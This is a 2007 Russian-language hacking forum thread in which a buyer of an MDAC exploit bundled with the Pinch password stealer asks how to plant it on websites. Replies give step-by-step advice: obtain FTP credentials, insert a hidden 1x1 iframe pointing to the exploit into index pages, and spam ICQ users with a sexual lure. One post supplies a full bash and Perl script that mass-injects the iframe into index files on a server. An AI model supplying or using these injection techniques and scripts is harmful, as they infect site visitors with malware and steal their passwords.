как залит експлоит на сайт ????????

Discussion in 'Песочница' started by gigabait, 2 May 2007.

  1. gigabait

    gigabait New Member

    Joined:
    25 Feb 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    -3
    привет люди помогите пожалуста!!! купил вот етот сплоит rds сплойт переработанный(mdac) у balmer"a ему уже все мозги проморочил не могу доперет как ево на сайт повесит искал в гоогле нашол статии
    про другие споити про ето нече не нашол подскажите че делат как вешат или статию
    какуюнибуд дайте но толко подробно а то мне поверхостно он уже обеснил не могу доперет первий раз в жизни со сплоитами дело имею.

    <iframe src="http://***********.com/sex/sexy.html" width=1 height=1 frameborder=0></iframe> вот ссилка на мой сплой с пинчем !!

    и куда ее на хосте ставит или на фтп моем или с логов. ни как доперет не могу.

    разобралса толко што сплоит надо на хост вешат свой сплоит и прописават в ссилку с <iframe src="http:// мой сайте где сплой html" width=1 height=1 frameborder=0></iframe>
    замучелса уже 2 дна сежу е**ся
     
  2. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    Возьми хороший учебник по html, прогугли ачат))))) чес слово так и не понял что у тя там и как, куда пинч куда сплойт. кинул бы линки, только не пойму что ты имешь ввиду под словом залить, здесь много способо. Немного почитай что пишут здесь, потом уже берись за что нибудь
     
  3. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    У тебя все готово тебе осталось только, чтобы туда заходили юзеры ;)
    покупаешь/ищещь ftp - доступы. Твоя задача открыть index.html(htm/php) файлы и вставить свой iframe
    (<iframe src="http://***********.com/sex/sexy.html" width=1 height=1 frameborder=0></iframe>)
    , но ручками делать это долго и не приятно. Для этого уже есть готовый ftp/iframe скрипт который все сделает за тебя. KSURI писал на perl поиши на форуме по ключевым словам "ftp/iframe/чекер". Так же можно возпользоватся IMtale ICQ spammer soft - так вот через него просто спам с текстом:
    Привет меня зовут Анна
    http://***********.com/sex/sexy.html - мои интим фото ;) зацени"
    и усе. . . .
     
    #3 KPOT_f!nd, 2 May 2007
    Last edited: 2 May 2007
  4. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Да просто зайди по ftp и в httpdocs или public_html в index.php или index.html пропиши свой iframe(вставь) в конце страницы. и все!!! Тоже самое с шеллом (если есть права на запись). Пример: http://www.westonimaginggroup.com/
     
  5. gigabait

    gigabait New Member

    Joined:
    25 Feb 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    -3
    подсказат кое што когда я сплоитой на сайт ставлю в индех.хтмл
    там тег боди в нево надо мой фрайм вставлат дак вопрос старий фрайм надо стерат или нет и еше иногда в редакторе индех.хтмл бивает несколко тегов боди в какой из них вставлат фрайм или просто в незу или на верху странице редакрора ставит мой фрайм
     
  6. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    На пользуйся! С тя плюс. Запускается /bin/bash iframe_script
    Права лучше nobody!

    Code:
    
    #!/bin/bash
    
    usage () {
      echo "##################################################  ######"
      echo "#Shadow iframer[local][n0b0dy version]  (c)ode by Gh0s7#"
      echo "##################################################  ######"
      echo "#usage: ./sh-iframe.sh [iframe file] [path]            #"
      echo "#       ./sh-iframe.sh exploit.html /var/www/31337.su  #"
      echo "##################################################  ######"
      exit 1
    }
    
    check=`expr length "$1"`
    if [ $check == 0 ]; then 
      usage
    fi
    
    check=`expr length "$2"`
    if [ $check == 0 ]; then 
      usage
    fi
    
    if [ ! -d $2 ]; then
      echo "[x] $2 directory doesnt exists"; exit 1
    fi
    
    echo -n "[*]Searching for perl..."; which perl
    
    if [ $? != 0 ]; then
      echo "[x]No perl?"; exit
    fi
    
    echo -n "[*]Starting index finder...please wait..."
    
    find $2 -name "index.html*" 2> /dev/null > /tmp/found 
    find $2 -name "index.php*"  2> /dev/null >> /tmp/found 
    find $2 -name "index.shtml" 2> /dev/null >> /tmp/found 
    find $2 -name "index.phtml" 2> /dev/null >> /tmp/found 
    find $2 -name "main.html*" 2> /dev/null > /tmp/found 
    find $2 -name "main.php*"  2> /dev/null >> /tmp/found 
    find $2 -name "default.php*"  2> /dev/null >> /tmp/found 
    find $2 -name "main.shtml" 2> /dev/null >> /tmp/found 
    
    len=`cat /tmp/found| wc -l`
    
    echo "search complete. Found $len pages"
    echo -n "[*]Generating iframer..."
    
    iframer='\n
    while (<INPUT>) {
      chomp; $file = $_;
      @res = split (/\//);
      $len = 0;
      foreach (@res) { $len++; }
      open (FILE, "<$_") or next;
      open (TMP, ">/tmp/$res[$len-1]") or next;
      open (INJECT, "<$inject") or die;
      sysread (INJECT, $code, 1024);
      close (INJECT);
      while (<FILE>) {
        print TMP $_;
        if (/<body>/) { print TMP $code; }
      }
      close (TMP);
      close (FILE);
      system ("./rm /tmp/$res[$len-1].bak 2>/dev/null");
      system ("./mv $file /tmp/$res[$len-1].bak");
      system ("./mv /tmp/$res[$len-1] $file");
    }'
    echo -ne "#!/usr/bin/perl -w\nopen (INPUT, \"</tmp/found\");\n\$inject=\"$1\";\n" > iframer.pl
    echo -ne "$iframer" >> iframer.pl
    
    echo 'mv $@' > /tmp/mv; chmod +x /tmp/mv
    echo 'rm $@' > /tmp/rm; chmod +x /tmp/rm
    
    echo "complete.Starting iframer"
    perl iframer.pl
    echo "[*] Injecting complete, deleting temp files..."
    rm /tmp/mv /tmp/rm
    rm /tmp/index*
    echo "[*] Finished"
    exit 0
    
    
     
  7. UZNIK

    UZNIK New Member

    Joined:
    6 Apr 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    вот так в конце страници пропиши если что то не понятно можешь стукнуть мне в асю 649435
    <html><head></head><body><iframe width=1 height=1 border=0 frameborder=0 src="http://ссылка на эксплойт"></iframe></body></html>
     
  8. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138

    Сволочь! Так вот кто меня спамил!
     
    3 people like this.
Loading...